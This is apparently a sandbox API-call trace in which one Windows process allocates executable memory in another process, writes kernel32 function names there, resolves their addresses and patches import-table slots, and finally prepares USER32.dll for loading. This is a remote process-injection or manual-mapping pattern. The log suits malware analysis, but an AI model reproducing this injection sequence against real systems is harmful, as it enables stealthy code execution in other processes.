	[0225.516] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.517] ResetEvent (hEvent=0x5d4) returned 1
	[0225.517] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.517] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.517] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.517] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.517] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.517] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004048, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.518] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.518] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.518] lstrlenA (lpString="GetProcessHeap") returned 14
	[0225.518] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.518] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2a0*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2a0*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0225.519] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.519] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.519] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.519] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.520] ResetEvent (hEvent=0x5d4) returned 1
	[0225.520] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.561] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.561] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.561] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.561] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000404c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.562] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.562] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.562] lstrlenA (lpString="lstrlenA") returned 8
	[0225.562] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.562] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2b2*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2b2*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0225.563] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.563] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.563] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.563] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.564] ResetEvent (hEvent=0x5d4) returned 1
	[0225.564] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.564] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.564] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.564] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.564] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.564] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004050, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.565] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.565] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.565] lstrlenA (lpString="HeapReAlloc") returned 11
	[0225.565] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.565] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2be*, nSize=0xc, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2be*, lpNumberOfBytesWritten=0x128674*=0xc) returned 1
	[0225.565] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.565] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.566] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.566] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.566] ResetEvent (hEvent=0x5d4) returned 1
	[0225.566] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.566] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.567] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.567] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.567] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004054, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.567] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.567] lstrlenA (lpString="ExitThread") returned 10
	[0225.567] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.568] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc34a*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc34a*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0225.568] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.568] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.568] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.568] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.569] ResetEvent (hEvent=0x5d4) returned 1
	[0225.569] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.569] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.569] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.569] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.569] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.569] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004058, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.570] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.570] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.570] lstrlenA (lpString="LeaveCriticalSection") returned 20
	[0225.570] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.570] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2e4*, nSize=0x15, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2e4*, lpNumberOfBytesWritten=0x128674*=0x15) returned 1
	[0225.570] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.571] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.571] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.571] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.571] ResetEvent (hEvent=0x5d4) returned 1
	[0225.571] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.572] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.572] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.572] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.572] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.572] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000405c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.572] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.573] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.573] lstrlenA (lpString="InitializeCriticalSection") returned 25
	[0225.573] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.573] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2fc*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2fc*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0225.573] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.573] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.573] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.573] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.574] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.574] ResetEvent (hEvent=0x5d4) returned 1
	[0225.574] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.574] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.574] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.574] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.574] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.574] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004060, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.575] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.575] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.575] lstrlenA (lpString="WaitForSingleObject") returned 19
	[0225.575] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.575] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc318*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc318*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0225.576] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.576] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.576] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.576] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.577] ResetEvent (hEvent=0x5d4) returned 1
	[0225.577] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.577] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.577] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.577] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.577] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004064, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.578] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.578] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.578] lstrlenA (lpString="FreeLibraryAndExitThread") returned 24
	[0225.578] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.578] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc32e*, nSize=0x19, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc32e*, lpNumberOfBytesWritten=0x128674*=0x19) returned 1
	[0225.578] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.578] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.578] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.579] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.579] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.579] ResetEvent (hEvent=0x5d4) returned 1
	[0225.579] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.580] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.580] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.580] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.580] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.580] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004068, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.580] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.580] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.581] lstrlenA (lpString="TerminateThread") returned 15
	[0225.581] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.581] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc360*, nSize=0x10, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc360*, lpNumberOfBytesWritten=0x128674*=0x10) returned 1
	[0225.581] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.581] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.581] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.582] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.582] ResetEvent (hEvent=0x5d4) returned 1
	[0225.582] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.582] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.582] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.582] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.583] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.583] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000406c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.583] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.583] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc3f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0225.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc3f8, cbMultiByte=-1, lpWideCharStr=0x2307988, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0225.584] lstrlenW (lpString="USER32.dll") returned 10
	[0225.584] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.584] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x2307988*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2307988*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0225.585] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.585] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.585] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.585] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.586] ResetEvent (hEvent=0x5d4) returned 1
	[0225.586] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.586] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.586] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
